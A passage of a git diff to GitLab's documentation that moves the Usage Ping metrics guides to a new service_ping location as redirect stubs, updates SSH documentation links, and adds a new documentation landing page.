"omnibus-gitlab", - "active_user_count": 999, - "recorded_at": "2020-04-17T07:43:54.162+00:00", - "edition": "EEU", - "license_md5": "00000000000000000000000000000000", - "license_id": null, - "historical_max_users": 999, - "licensee": { - "Name": "ABC, Inc.", - "Email": "email@example.com", - "Company": "ABC, Inc." - }, - "license_user_count": 999, - "license_starts_at": "2020-01-01", - "license_expires_at": "2021-01-01", - "license_plan": "ultimate", - "license_add_ons": { - }, - "license_trial": false, - "counts": { - "assignee_lists": 999, - "boards": 999, - "ci_builds": 999, - ... - }, - "container_registry_enabled": true, - "dependency_proxy_enabled": false, - "gitlab_shared_runners_enabled": true, - "gravatar_enabled": true, - "influxdb_metrics_enabled": true, - "ldap_enabled": false, - "mattermost_enabled": false, - "omniauth_enabled": true, - "prometheus_enabled": false, - "prometheus_metrics_enabled": false, - "reply_by_email_enabled": "incoming+%{key}@incoming.gitlab.com", - "signup_enabled": true, - "web_ide_clientside_preview_enabled": true, - "projects_with_expiration_policy_disabled": 999, - "projects_with_expiration_policy_enabled": 999, - ... - "elasticsearch_enabled": true, - "license_trial_ends_on": null, - "geo_enabled": false, - "git": { - "version": { - "major": 2, - "minor": 26, - "patch": 1 - } - }, - "gitaly": { - "version": "12.10.0-rc1-93-g40980d40", - "servers": 56, - "clusters": 14, - "filesystems": [ - "EXT_2_3_4" - ] - }, - "gitlab_pages": { - "enabled": true, - "version": "1.17.0" - }, - "container_registry_server": { - "vendor": "gitlab", - "version": "2.9.1-gitlab" - }, - "database": { - "adapter": "postgresql", - "version": "9.6.15", - "pg_system_id": 6842684531675334351 - }, - "analytics_unique_visits": { - "g_analytics_contribution": 999, - ... - }, - "usage_activity_by_stage": { - "configure": { - "project_clusters_enabled": 999, - ... - }, - "create": { - "merge_requests": 999, - ... - }, - "manage": { - "events": 999, - ... - }, - "monitor": { - "clusters": 999, - ... - }, - "package": { - "projects_with_packages": 999 - }, - "plan": { - "issues": 999, - ... - }, - "release": { - "deployments": 999, - ... - }, - "secure": { - "user_container_scanning_jobs": 999, - ... - }, - "verify": { - "ci_builds": 999, - ... - } - }, - "usage_activity_by_stage_monthly": { - "configure": { - "project_clusters_enabled": 999, - ... - }, - "create": { - "merge_requests": 999, - ... - }, - "manage": { - "events": 999, - ... - }, - "monitor": { - "clusters": 999, - ... - }, - "package": { - "projects_with_packages": 999 - }, - "plan": { - "issues": 999, - ... - }, - "release": { - "deployments": 999, - ... - }, - "secure": { - "user_container_scanning_jobs": 999, - ... - }, - "verify": { - "ci_builds": 999, - ... - } - }, - "topology": { - "duration_s": 0.013836685999194742, - "application_requests_per_hour": 4224, - "query_apdex_weekly_average": 0.996, - "failures": [], - "nodes": [ - { - "node_memory_total_bytes": 33269903360, - "node_memory_utilization": 0.35, - "node_cpus": 16, - "node_cpu_utilization": 0.2, - "node_uname_info": { - "machine": "x86_64", - "sysname": "Linux", - "release": "4.19.76-linuxkit" - }, - "node_services": [ - { - "name": "web", - "process_count": 16, - "process_memory_pss": 233349888, - "process_memory_rss": 788220927, - "process_memory_uss": 195295487, - "server": "puma" - }, - { - "name": "sidekiq", - "process_count": 1, - "process_memory_pss": 734080000, - "process_memory_rss": 750051328, - "process_memory_uss": 731533312 - }, - ... - ], - ... - }, - ... - ] - } -} -``` - -## Notable changes - -In GitLab 13.5, `pg_system_id` was added to send the [PostgreSQL system identifier](https://www.2ndquadrant.com/en/blog/support-for-postgresqls-system-identifier-in-barman/). - -## Exporting Usage Ping SQL queries and definitions - -Two Rake tasks exist to export Usage Ping definitions. - -- The Rake tasks export the raw SQL queries for `count`, `distinct_count`, `sum`. -- The Rake tasks export the Redis counter class or the line of the Redis block for `redis_usage_data`. -- The Rake tasks calculate the `alt_usage_data` metrics. - -In the home directory of your local GitLab installation run the following Rake tasks for the YAML and JSON versions respectively: - -```shell -# for YAML export -bin/rake gitlab:usage_data:dump_sql_in_yaml - -# for JSON export -bin/rake gitlab:usage_data:dump_sql_in_json - -# You may pipe the output into a file -bin/rake gitlab:usage_data:dump_sql_in_yaml > ~/Desktop/usage-metrics-2020-09-02.yaml -``` - -## Generating and troubleshooting usage ping - -This activity is to be done via a detached screen session on a remote server. - -Before you begin these steps, make sure the key is added to the SSH agent locally -with the `ssh-add` command. - -### Triggering - -1. Connect to bastion with agent forwarding: `$ ssh -A lb-bastion.gprd.gitlab.com` -1. Create named screen: `$ screen -S <username>_usage_ping_<date>` -1. Connect to console host: `$ ssh $USER-rails@console-01-sv-gprd.c.gitlab-production.internal` -1. Run `SubmitUsagePingService.new.execute` -1. Detach from screen: `ctrl + a, ctrl + d` -1. Exit from bastion: `$ exit` - -### Verification (After approx 30 hours) - -1. Reconnect to bastion: `$ ssh -A lb-bastion.gprd.gitlab.com` -1. Find your screen session: `$ screen -ls` -1. Attach to your screen session: `$ screen -x 14226.mwawrzyniak_usage_ping_2021_01_22` -1. Check the last payload in `raw_usage_data` table: `RawUsageData.last.payload` -1. Check the when the payload was sent: `RawUsageData.last.sent_at` +<!-- This redirect file can be deleted after <2021-10-09>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/usage_ping/metrics_dictionary.md b/doc/development/usage_ping/metrics_dictionary.md index 6b5fed4bcca..3743c2e0414 100644 --- a/doc/development/usage_ping/metrics_dictionary.md +++ b/doc/development/usage_ping/metrics_dictionary.md @@ -1,237 +1,9 @@ --- -stage: Growth -group: Product Intelligence -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +redirect_to: '../service_ping/metrics_dictionary.md' +remove_date: '2021-10-09' --- -# Metrics Dictionary Guide +This file was moved to [another location](../service_ping/metrics_dictionary.md). -This guide describes Metrics Dictionary and how it's implemented - -## Metrics Definition and validation - -We are using [JSON Schema](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/schema.json) to validate the metrics definition. - -This process is meant to ensure consistent and valid metrics defined for Usage Ping. All metrics *must*: - -- Comply with the defined [JSON schema](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/schema.json). -- Have a unique `key_path` . -- Have an owner. - -All metrics are stored in YAML files: - -- [`config/metrics`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/config/metrics) - -Each metric is defined in a separate YAML file consisting of a number of fields: - -| Field | Required | Additional information | -|---------------------|----------|----------------------------------------------------------------| -| `key_path` | yes | JSON key path for the metric, location in Usage Ping payload. | -| `name` | no | Metric name suggestion. Can replace the last part of `key_path`. | -| `description` | yes | | -| `product_section` | yes | The [section](https://gitlab.com/gitlab-com/www-gitlab-com/-/blob/master/data/sections.yml). | -| `product_stage` | no | The [stage](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/data/stages.yml) for the metric. | -| `product_group` | yes | The [group](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/data/stages.yml) that owns the metric. | -| `product_category` | no | The [product category](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/data/categories.yml) for the metric. | -| `value_type` | yes | `string`; one of [`string`, `number`, `boolean`, `object`](https://json-schema.org/understanding-json-schema/reference/type.html). | -| `status` | yes | `string`; [status](#metric-statuses) of the metric, may be set to `data_available`, `implemented`, `not_used`, `deprecated`, `removed`, `broken`. | -| `time_frame` | yes | `string`; may be set to a value like `7d`, `28d`, `all`, `none`. | -| `data_source` | yes | `string`; may be set to a value like `database`, `redis`, `redis_hll`, `prometheus`, `system`. | -| `data_category` | yes | `string`; [categories](#data-category) of the metric, may be set to `Operational`, `Optional`, `Subscription`, `Standard`. | -| `instrumentation_class` | no | `string`; [the class that implements the metric](metrics_instrumentation.md). | -| `distribution` | yes | `array`; may be set to one of `ce, ee` or `ee`. The [distribution](https://about.gitlab.com/handbook/marketing/strategic-marketing/tiers/#definitions) where the tracked feature is available. | -| `tier` | yes | `array`; may be set to one of `free, premium, ultimate`, `premium, ultimate` or `ultimate`. The [tier]( https://about.gitlab.com/handbook/marketing/strategic-marketing/tiers/) where the tracked feature is available. | -| `milestone` | no | The milestone when the metric is introduced. | -| `milestone_removed` | no | The milestone when the metric is removed. | -| `introduced_by_url` | no | The URL to the Merge Request that introduced the metric. | -| `repair_issue_url` | no | The URL of the issue that was created to repair a metric with a `broken` status. | -| `options` | no | `object`: options information needed to calculate the metric value. | -| `skip_validation` | no | This should **not** be set. [Used for imported metrics until we review, update and make them valid](https://gitlab.com/groups/gitlab-org/-/epics/5425). | - -### Metric statuses - -Metric definitions can have one of the following statuses: - -- `data_available`: Metric data is available and used in a Sisense dashboard. -- `implemented`: Metric is implemented but data is not yet available. This is a temporary - status for newly added metrics awaiting inclusion in a new release. -- `broken`: Metric reports broken data (for example, -1 fallback), or does not report data at all. A metric marked as `broken` must also have the `repair_issue_url` attribute. -- `not_used`: Metric is not used in any dashboard. -- `deprecated`: Metric is deprecated and possibly planned to be removed. -- `removed`: Metric was removed, but it may appear in Usage Ping payloads sent from instances running on older versions of GitLab. - -### Metric value_type - -Metric definitions can have one of the following values for `value_type`: - -- `boolean` -- `number` -- `string` -- `object`: A metric with `value_type: object` must have `value_json_schema` with a link to the JSON schema for the object. -In general, we avoid complex objects and prefer one of the `boolean`, `number`, or `string` value types. -An example of a metric that uses `value_type: object` is `topology` (`/config/metrics/settings/20210323120839_topology.yml`), -which has a related schema in `/config/metrics/objects_schemas/topology_schema.json`. - -### Metric time_frame - -- `7d`: The metric data applies to the most recent 7-day interval. For example, the following metric counts the number of users that create epics over a 7-day interval: `ee/config/metrics/counts_7d/20210305145820_g_product_planning_epic_created_weekly.yml`. -- `28d`: The metric data applies to the most recent 28-day interval. For example, the following metric counts the number of unique users that create issues over a 28-day interval: `config/metrics/counts_28d/20210216181139_issues.yml`. -- `all`: The metric data applies for the whole time the metric has been active (all-time interval). For example, the following metric counts all users that create issues: `/config/metrics/counts_all/20210216181115_issues.yml`. -- `none`: The metric collects a type of data that's not tracked over time, such as settings and configuration information. Therefore, a time interval is not applicable. For example, `uuid` has no time interval applicable: `config/metrics/license/20210201124933_uuid.yml`. - -### Metric name - -To improve metric discoverability by a wider audience, each metric with -instrumentation added at an appointed `key_path` receives a `name` attribute -filled with the name suggestion, corresponding to the metric `data_source` and instrumentation. -Metric name suggestions can contain two types of elements: - -1. **User input prompts**: Enclosed by `<>`, these pieces should be replaced or - removed when you create a metrics YAML file. -1. **Fixed suggestion**: Plaintext parts generated according to well-defined algorithms. - They are based on underlying instrumentation, and should not be changed. - -For a metric name to be valid, it must not include any prompt, and no fixed suggestions -should be changed. - -### Data category - -We use the following categories to classify a metric: - -- `Operational`: Required data for operational purposes. -- `Optional`: Data that is optional to collect. This can be [enabled or disabled](../usage_ping/index.md#disable-usage-ping) in the Admin Area. -- `Subscription`: Data related to licensing. -- `Standard`: Standard set of identifiers that are included when collecting data. - -### Metric name suggestion examples - -#### Metric with `data_source: database` - -For a metric instrumented with SQL: - -```sql -SELECT COUNT(DISTINCT user_id) FROM clusters WHERE clusters.management_project_id IS NOT NULL -``` - -- **Suggested name**: `count_distinct_user_id_from_<adjective describing: '(clusters.management_project_id IS NOT NULL)'>_clusters` -- **Prompt**: `<adjective describing: '(clusters.management_project_id IS NOT NULL)'>` - should be replaced with an adjective that best represents filter conditions, such as `project_management` -- **Final metric name**: For example, `count_distinct_user_id_from_project_management_clusters` - -For metric instrumented with SQL: - -```sql -SELECT COUNT(DISTINCT clusters.user_id) -FROM clusters_applications_helm -INNER JOIN clusters ON clusters.id = clusters_applications_helm.cluster_id -WHERE clusters_applications_helm.status IN (3, 5) -``` - -- **Suggested name**: `count_distinct_user_id_from_<adjective describing: '(clusters_applications_helm.status IN (3, 5))'>_clusters_<with>_<adjective describing: '(clusters_applications_helm.status IN (3, 5))'>_clusters_applications_helm` -- **Prompt**: `<adjective describing: '(clusters_applications_helm.status IN (3, 5))'>` - should be replaced with an adjective that best represents filter conditions -- **Final metric name**: `count_distinct_user_id_from_clusters_with_available_clusters_applications_helm` - -In the previous example, the prompt is irrelevant, and user can remove it. The second -occurrence corresponds with the `available` scope defined in `Clusters::Concerns::ApplicationStatus`. -It can be used as the right adjective to replace prompt. - -The `<with>` represents a suggested conjunction for the suggested name of the joined relation. -The person documenting the metric can use it by either: - -- Removing the surrounding `<>`. -- Using a different conjunction, such as `having` or `including`. - -#### Metric with `data_source: redis` or `redis_hll` - -For metrics instrumented with a Redis-based counter, the suggested name includes -only the single prompt to be replaced by the person working with metrics YAML. - -- **Prompt**: `<please fill metric name, suggested format is: {subject}_{verb}{ing|ed}_{object} eg: users_creating_epics or merge_requests_viewed_in_single_file_mode>` -- **Final metric name**: We suggest the metric name should follow the format of - `{subject}_{verb}{ing|ed}_{object}`, such as `user_creating_epics`, `users_triggering_security_scans`, - or `merge_requests_viewed_in_single_file_mode` - -#### Metric with `data_source: prometheus` or `system` - -For metrics instrumented with Prometheus or coming from the operating system, -the suggested name includes only the single prompt by person working with metrics YAML. - -- **Prompt**: `<please fill metric name>` -- **Final metric name**: Due to the variety of cases that can apply to this kind of metric, - no naming convention exists. Each person instrumenting a metric should use their - best judgment to come up with a descriptive name. - -### Example YAML metric definition - -The linked [`uuid`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/uuid.yml) -YAML file includes an example metric definition, where the `uuid` metric is the GitLab -instance unique identifier. - -```yaml -key_path: uuid -description: GitLab instance unique identifier -product_category: collection -product_section: growth -product_stage: growth -product_group: group::product intelligence -value_type: string -status: data_available -milestone: 9.1 -introduced_by_url: https://gitlab.com/gitlab-org/gitlab/-/merge_requests/1521 -time_frame: none -data_source: database -distribution: -- ce -- ee -tier: -- free -- premium -- ultimate -``` - -## Create a new metric definition - -The GitLab codebase provides a dedicated [generator](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/generators/gitlab/usage_metric_definition_generator.rb) to create new metric definitions. - -For uniqueness, the generated file includes a timestamp prefix, in ISO 8601 format. - -The generator takes the key path argument and 2 options and creates the metric YAML definition in corresponding location: - -- `--ee`, `--no-ee` Indicates if metric is for EE. -- `--dir=DIR` indicates the metric directory. It must be one of: `counts_7d`, `7d`, `counts_28d`, `28d`, `counts_all`, `all`, `settings`, `license`. - -```shell -bundle exec rails generate gitlab:usage_metric_definition counts.issues --dir=7d -create config/metrics/counts_7d/issues.yml -``` - -NOTE: -To create a metric definition used in EE, add the `--ee` flag. - -```shell -bundle exec rails generate gitlab:usage_metric_definition counts.issues --ee --dir=7d -create ee/config/metrics/counts_7d/issues.yml -``` - -## Metrics added dynamic to Usage Ping payload - -The [Redis HLL metrics](index.md#known-events-are-added-automatically-in-usage-data-payload) are added automatically to Usage Ping payload. - -A YAML metric definition is required for each metric. A dedicated generator is provided to create metric definitions for Redis HLL events. - -The generator takes `category` and `event` arguments, as the root key will be `redis_hll_counters`, and creates two metric definitions for weekly and monthly timeframes: - -```shell -bundle exec rails generate gitlab:usage_metric_definition:redis_hll issues i_closed -create config/metrics/counts_7d/i_closed_weekly.yml -create config/metrics/counts_28d/i_closed_monthly.yml -``` - -To create a metric definition used in EE, add the `--ee` flag. - -```shell -bundle exec rails generate gitlab:usage_metric_definition:redis_hll issues users_closing_issues --ee -create config/metrics/counts_7d/i_closed_weekly.yml -create config/metrics/counts_28d/i_closed_monthly.yml -``` +<!-- This redirect file can be deleted after <2021-10-09>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/usage_ping/metrics_instrumentation.md b/doc/development/usage_ping/metrics_instrumentation.md index ff0dbf99a09..f2d731803b8 100644 --- a/doc/development/usage_ping/metrics_instrumentation.md +++ b/doc/development/usage_ping/metrics_instrumentation.md @@ -1,102 +1,9 @@ --- -stage: Growth -group: Product Intelligence -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +redirect_to: '../service_ping/metrics_instrumentation.md' +remove_date: '2021-10-09' --- -# Metrics instrumentation guide +This file was moved to [another location](../service_ping/metrics_instrumentation.md). -This guide describes how to develop Usage Ping metrics using metrics instrumentation. - -## Nomenclature - -- **Instrumentation class**: - - Inherits one of the metric classes: `DatabaseMetric`, `RedisHLLMetric` or `GenericMetric`. - - Implements the logic that calculates the value for a Usage Ping metric. - -- **Metric definition** - The Usage Data metric YAML definition. - -- **Hardening**: - Hardening a method is the process that ensures the method fails safe, returning a fallback value like -1. - -## How it works - -A metric definition has the [`instrumentation_class`](metrics_dictionary.md) field, which can be set to a class. - -The defined instrumentation class should have one of the existing metric classes: `DatabaseMetric`, `RedisHLLMetric`, or `GenericMetric`. - -Using the instrumentation classes ensures that metrics can fail safe individually, without breaking the entire - process of Usage Ping generation. - -We have built a domain-specific language (DSL) to define the metrics instrumentation. - -## Database metrics - -[Example of a merge request that adds a database metric](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/60022). - -```ruby -module Gitlab - module Usage - module Metrics - module Instrumentations - class CountBoardsMetric < DatabaseMetric - operation :count - - relation { Board } - end - end - end - end -end -``` - -## Redis HyperLogLog metrics - -[Example of a merge request that adds a `RedisHLL` metric](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/61685). - -Count unique values for `i_quickactions_approve` event. - -```yaml -time_frame: 28d -data_source: redis_hll -instrumentation_class: 'Gitlab::Usage::Metrics::Instrumentations::RedisHLLMetric' -options: - events: - - i_quickactions_approve -``` - -## Generic metrics - -[Example of a merge request that adds a generic metric](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/60256). - -```ruby -module Gitlab - module Usage - module Metrics - module Instrumentations - class UuidMetric < GenericMetric - value do - Gitlab::CurrentSettings.uuid - end - end - end - end - end -end -``` - -## Creating a new metric instrumentation class - -To create a stub instrumentation for a Usage Ping metric, you can use a dedicated [generator](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/generators/gitlab/usage_metric_generator.rb): - -The generator takes the class name as an argument and the following options: - -- `--type=TYPE` Required. Indicates the metric type. It must be one of: `database`, `generic`, `redis_hll`. -- `--ee` Indicates if the metric is for EE. - -```shell -rails generate gitlab:usage_metric CountIssues --type database - create lib/gitlab/usage/metrics/instrumentations/count_issues_metric.rb - create spec/lib/gitlab/usage/metrics/instrumentations/count_issues_metric_spec.rb -``` +<!-- This redirect file can be deleted after <2021-10-09>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/usage_ping/product_intelligence_review.md b/doc/development/usage_ping/product_intelligence_review.md index 0e86a116bca..dc51e3e300a 100644 --- a/doc/development/usage_ping/product_intelligence_review.md +++ b/doc/development/usage_ping/product_intelligence_review.md @@ -1,91 +1,9 @@ --- -stage: Growth -group: Product Intelligence -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +redirect_to: '../service_ping/review_guidelines.md' +remove_date: '2021-10-09' --- -# Product Intelligence review guidelines +This file was moved to [another location](../service_ping/review_guidelines.md). -This page includes introductory material for a -[Product Intelligence](https://about.gitlab.com/handbook/engineering/development/growth/product-intelligence/) -review, and is specific to Product Intelligence reviews. For broader advice and -general best practices for code reviews, refer to our [code review guide](../code_review.md). - -## Resources for Product Intelligence reviewers - -- [Usage Ping Guide](index.md) -- [Snowplow Guide](../snowplow/index.md) -- [Metrics Dictionary](metrics_dictionary.md) - -## Review process - -We recommend a Product Intelligence review when an application update touches -Product Intelligence files. - -- Changes that touch `usage_data*` files. -- Changes to the Metrics Dictionary including files in: - - [`config/metrics`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/config/metrics). - - [`ee/config/metrics`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/ee/config/metrics). - - [`dictionary.md`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/development/usage_ping/dictionary.md). - - [`schema.json`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/schema.json). -- Changes to `tracking` files. -- Changes to Product Intelligence tooling. For example, - [`Gitlab::UsageMetricDefinitionGenerator`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/generators/gitlab/usage_metric_definition_generator.rb) - -### Roles and process - -#### The merge request **author** should - -- Decide whether a Product Intelligence review is needed. -- If a Product Intelligence review is needed, add the labels - `~product intelligence` and `~product intelligence::review pending`. -- Assign an - [engineer](https://gitlab.com/groups/gitlab-org/growth/product-intelligence/engineers/-/group_members?with_inherited_permissions=exclude) from the Product Intelligence team for a review. -- Set the correct attributes in YAML metrics: - - `product_section`, `product_stage`, `product_group`, `product_category` - - Provide a clear description of the metric. -- Update the - [Metrics Dictionary](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/development/usage_ping/dictionary.md) if it is needed. -- Add a changelog [according to guidelines](../changelog.md). - -##### When adding or modifying Snowplow events - -- For frontend events, when relevant, add a screenshot of the event in - the [testing tool](../snowplow/index.md#developing-and-testing-snowplow) used. -- For backend events, when relevant, add the output of the Snowplow Micro - good events `GET http://localhost:9090/micro/good` (it might be a good idea - to reset with `GET http://localhost:9090/micro/reset` first). - -#### The Product Intelligence **reviewer** should - -- Perform a first-pass review on the merge request and suggest improvements to the author. -- Approve the MR, and relabel the MR with `~"product intelligence::approved"`. - -## Review workload distribution - -[Danger bot](../dangerbot.md) adds the list of Product Intelligence changed files -and pings the -[`@gitlab-org/growth/product-intelligence/engineers`](https://gitlab.com/groups/gitlab-org/growth/product-intelligence/engineers/-/group_members?with_inherited_permissions=exclude) group for merge requests -that are not drafts. - -Any of the Product Intelligence engineers can be assigned for the Product Intelligence review. - -### How to review for Product Intelligence - -- Check the [metrics location](index.md#1-naming-and-placing-the-metrics) in - the Usage Ping JSON payload. -- Add `~database` label and ask for [database review](../database_review.md) for - metrics that are based on Database. -- For tracking using Redis HLL (HyperLogLog): - - Check the Redis slot. - - Check if a [feature flag is needed](index.md#recommendations). -- For tracking with Snowplow: - - Check that the [event taxonomy](../snowplow/index.md#structured-event-taxonomy) is correct. - - Check the [usage recommendations](../snowplow/index.md#usage-recommendations). -- Metrics YAML definitions: - - Check the metric `description`. - - Check the metrics `key_path`. - - Check the `product_section`, `product_stage`, `product_group`, `product_category`. - Read the [stages file](https://gitlab.com/gitlab-com/www-gitlab-com/blob/master/data/stages.yml). - - Check the file location. Consider the time frame, and if the file should be under `ee`. - - Check the tiers. +<!-- This redirect file can be deleted after <2021-10-09>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/usage_ping/review_guidelines.md b/doc/development/usage_ping/review_guidelines.md new file mode 100644 index 00000000000..dc51e3e300a --- /dev/null +++ b/doc/development/usage_ping/review_guidelines.md @@ -0,0 +1,9 @@ +--- +redirect_to: '../service_ping/review_guidelines.md' +remove_date: '2021-10-09' +--- + +This file was moved to [another location](../service_ping/review_guidelines.md). + +<!-- This redirect file can be deleted after <2021-10-09>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/downgrade_ee_to_ce/README.md b/doc/downgrade_ee_to_ce/README.md deleted file mode 100644 index 488d86f129d..00000000000 --- a/doc/downgrade_ee_to_ce/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-11' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-11. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/gitlab-basics/README.md b/doc/gitlab-basics/README.md deleted file mode 100644 index 488d86f129d..00000000000 --- a/doc/gitlab-basics/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-11' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-11. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/gitlab-basics/create-project.md b/doc/gitlab-basics/create-project.md deleted file mode 100644 index 2d9e458408a..00000000000 --- a/doc/gitlab-basics/create-project.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../user/project/working_with_projects.md' -remove_date: '2021-05-05' ---- - -This document was moved to [another location](../user/project/working_with_projects.md). - -<!-- This redirect file can be deleted after <2021-05-05>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page -->
\ No newline at end of file diff --git a/doc/gitlab-basics/create-your-ssh-keys.md b/doc/gitlab-basics/create-your-ssh-keys.md index a99307e6dbf..673fb2911fa 100644 --- a/doc/gitlab-basics/create-your-ssh-keys.md +++ b/doc/gitlab-basics/create-your-ssh-keys.md @@ -1,9 +1,9 @@ --- -redirect_to: '../ssh/README.md' +redirect_to: '../ssh/index.md' remove_date: '2021-07-04' --- -This document was moved to [another location](../ssh/README.md). +This document was moved to [another location](../ssh/index.md). <!-- This redirect file can be deleted after <2021-07-04>. --> <!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page -->
\ No newline at end of file diff --git a/doc/gitlab-basics/fork-project.md b/doc/gitlab-basics/fork-project.md deleted file mode 100644 index f006f8b7ad6..00000000000 --- a/doc/gitlab-basics/fork-project.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../user/project/working_with_projects.md' -remove_date: '2021-05-04' ---- - -This document was moved to [another location](../user/project/working_with_projects.md). - -<!-- This redirect file can be deleted after <2021-05-04>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page -->
\ No newline at end of file diff --git a/doc/gitlab-basics/index.md b/doc/gitlab-basics/index.md index 774931aad72..d2d0c4fad39 100644 --- a/doc/gitlab-basics/index.md +++ b/doc/gitlab-basics/index.md @@ -21,7 +21,7 @@ This documentation is split into the following groups: The following are guides to basic GitLab functionality: -- [Create and add your SSH public key](../ssh/README.md), for enabling Git over SSH. +- [Create and add your SSH public key](../ssh/index.md), for enabling Git over SSH. - [Create a project](../user/project/working_with_projects.md#create-a-project), to start using GitLab. - [Create a group](../user/group/index.md#create-a-group), to combine and administer projects together. diff --git a/doc/gitlab-basics/start-using-git.md b/doc/gitlab-basics/start-using-git.md index f9623586e55..9b26e1f102c 100644 --- a/doc/gitlab-basics/start-using-git.md +++ b/doc/gitlab-basics/start-using-git.md @@ -182,7 +182,7 @@ This connection requires you to add credentials. You can either use SSH or HTTPS Clone with SSH when you want to authenticate only one time. -1. Authenticate with GitLab by following the instructions in the [SSH documentation](../ssh/README.md). +1. Authenticate with GitLab by following the instructions in the [SSH documentation](../ssh/index.md). 1. Go to your project's landing page and select **Clone**. Copy the URL for **Clone with SSH**. 1. Open a terminal and go to the directory where you want to clone the files. Git automatically creates a folder with the repository name and downloads the files there. 1. Run this command: diff --git a/doc/index.md b/doc/index.md new file mode 100644 index 00000000000..cb8b0e67f7d --- /dev/null +++ b/doc/index.md @@ -0,0 +1,126 @@ +--- +stage: none +group: unassigned +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +comments: false +description: 'Learn how to use and administer GitLab, the most scalable Git-based fully integrated platform for software development.' +--- + +<div class="d-none"> + <h3>Visit <a href="https://docs.gitlab.com/ee/">docs.gitlab.com</a> for the latest version + of this help information with enhanced navigation, discoverability, and readability.</h3> +</div> +<!-- the div above will not display on the docs site but will display on /help --> + +# GitLab Docs + +Welcome to [GitLab](https://about.gitlab.com/) documentation. + +Here you can access the complete documentation for GitLab, the single application for the +[entire DevOps lifecycle](#the-entire-devops-lifecycle). + +## Overview + +No matter how you use GitLab, we have documentation for you. + +| Essential documentation | Essential documentation | +|:------------------------|:------------------------| +| [**User documentation**](user/index.md)<br>Discover features and concepts for GitLab users. | [**Administrator documentation**](administration/index.md)<br/>Everything GitLab self-managed administrators need to know. | +| [**Contributing to GitLab**](#contributing-to-gitlab)<br/>At GitLab, everyone can contribute! | [**New to Git and GitLab?**](#new-to-git-and-gitlab)<br/>We have the resources to get you started. | +| [**Build an integration with GitLab**](#build-an-integration-with-gitlab)<br/>Consult our integration documentation. | [**Coming to GitLab from another platform?**](#coming-to-gitlab-from-another-platform)<br/>Consult our guides. | +| [**Install GitLab**](https://about.gitlab.com/install/)<br/>Installation options for different platforms. | [**Customers**](subscriptions/index.md)<br/>Information for new and existing customers. | +| [**Update GitLab**](update/index.md)<br/>Update your GitLab self-managed instance to the latest version. | [**Reference Architectures**](administration/reference_architectures/index.md)<br/>GitLab reference architectures. | +| [**GitLab releases**](https://about.gitlab.com/releases/)<br/>What's new in GitLab. | | + +## Popular topics + +Have a look at some of our most popular topics: + +| Popular topic | Description | +|:-------------------------------------------------------------------------------------------|:------------| +| [Two-factor authentication](user/profile/account/two_factor_authentication.md) | Improve the security of your GitLab account. | +| [GitLab groups](user/group/index.md) | Manage projects together. | +| [GitLab CI/CD pipeline configuration reference](ci/yaml/index.md) | Available configuration options for `.gitlab-ci.yml` files. | +| [Activate GitLab EE with a license](user/admin_area/license.md) | Activate GitLab Enterprise Edition functionality with a license. | +| [Back up and restore GitLab](raketasks/backup_restore.md) | Rake tasks for backing up and restoring GitLab self-managed instances. | +| [GitLab release and maintenance policy](policy/maintenance.md) | Policies for version naming and cadence, and also upgrade recommendations. | +| [Elasticsearch integration](integration/elasticsearch.md) | Integrate Elasticsearch with GitLab to enable advanced searching. | +| [Omnibus GitLab database settings](https://docs.gitlab.com/omnibus/settings/database.html) | Database settings for Omnibus GitLab self-managed instances. | +| [Omnibus GitLab NGINX settings](https://docs.gitlab.com/omnibus/settings/nginx.html) | NGINX settings for Omnibus GitLab self-managed instances. | +| [Omnibus GitLab SSL 